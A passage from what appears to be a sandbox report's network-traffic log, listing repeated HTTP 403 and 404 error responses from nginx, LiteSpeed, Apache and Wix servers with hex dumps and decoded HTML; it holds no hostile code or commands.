3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 146Content-Type: text/htmlServer: PepyakaX-Wix-Request-Id: 1718007680.75121635234316589X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Mon, 10 Jun 2024 08:21:20 GMTX-Served-By: cache-dfw-kdfw8210133-DFWX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLpqA3Os764o0I4PRjoOFA1EG/hKs8AeY1T4OIbgnD+yxVia: 1.1 googleglb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 146Content-Type: text/htmlServer: PepyakaX-Wix-Request-Id: 1718007683.192217429985716572X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Mon, 10 Jun 2024 08:21:23 GMTX-Served-By: cache-dfw-kdfw8210062-DFWX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLkPYl3Dc4B5QnXwwDz84vBQG/hKs8AeY1T4OIbgnD+yxVia: 1.1 googleglb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainDate: Mon, 10 Jun 2024 08:21:32 GMTContent-Length: 18Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainDate: Mon, 10 Jun 2024 08:21:34 GMTContent-Length: 18Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainDate: Mon, 10 Jun 2024 08:21:37 GMTContent-Length: 18Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainDate: Mon, 10 Jun 2024 08:21:39 GMTContent-Length: 18Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Mon, 10 Jun 2024 08:22:29 GMTContent-Type: text/html; charset=utf-8Content-Length: 153Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Mon, 10 Jun 2024 08:22:31 GMTContent-Type: text/html; charset=utf-8Content-Length: 153Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Mon, 10 Jun 2024 08:22:34 GMTContent-Type: text/html; charset=utf-8Content-Length: 153Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Mon, 10 Jun 2024 08:22:36 GMTContent-Type: text/html; charset=utf-8Content-Length: 153Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Mon, 10 Jun 2024 08:22:42 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Mon, 10 Jun 2024 08:22:45 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Mon, 10 Jun 2024 08:22:47 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Mon, 10 Jun 2024 08:22:50 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Jun 2024 08:22:58 GMTServer: ApacheContent-Length: 16026Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 